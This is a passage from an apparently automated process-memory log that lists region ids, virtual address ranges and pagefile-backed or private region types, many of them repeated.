pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3024 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3025 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3026 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3027 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3028 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3029 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3030 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3031 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3032 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3033 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3034 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3035 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3036 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3037 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3038 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3039 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3040 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3041 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3043 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3044 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3045 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3046 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3047 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3048 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3049 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3050 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3051 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3052 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3053 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3054 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3055 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3056 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3057 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3058 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3059 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3060 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3061 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3062 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3063 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3064 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3065 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3066 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3067 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3068 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3069 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3070 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3071 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3072 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3073 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3074 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3075 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3076 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3077 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3078 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3079 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3080 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3081 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3082 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3083 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3084 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3085 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3086 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3087 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3088 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3089 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3090 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3091 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3092 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3093 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3094 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3095 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3096 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3097 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3098 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3099 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3100 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3101 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3102 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3103 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3104 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3105 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3106 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3107 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3108 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3109 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3110 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3111 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3112 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3113 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3114 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3115 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3116 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3117 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3118 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3119 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3120 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3121 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3122 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3123 start_va = 0x82a0000 end_va = 0x82dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 3124 start_va = 0x82e0000 end_va = 0x831ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082e0000" filename = "" Region: id = 3125 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3126 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3127 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3128 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3129 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3130 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3131 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3132 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3133 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3134 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3135 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3136 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3137 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3138 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3139 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3140 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3141 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3142 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3143 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3144 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3145 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3146 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3147 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3148 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3149 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3150 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3151 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3152 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3153 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3154 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3155 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3156 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3157 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3158 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3159 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3160 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3161 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3162 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3163 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3164 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3165 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3166 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3167 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3168 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3169 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3170 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3171 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3172 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3173 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3174 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3175 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3176 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3177 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3178 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3179 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3180 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3181 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3182 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3183 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3184 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3185 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3186 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 3187 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 3188 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 3189 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3190 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3191 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3192 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3193 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3194 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3195 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3196 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3197 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3198 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3199 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3200 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3201 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3202 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 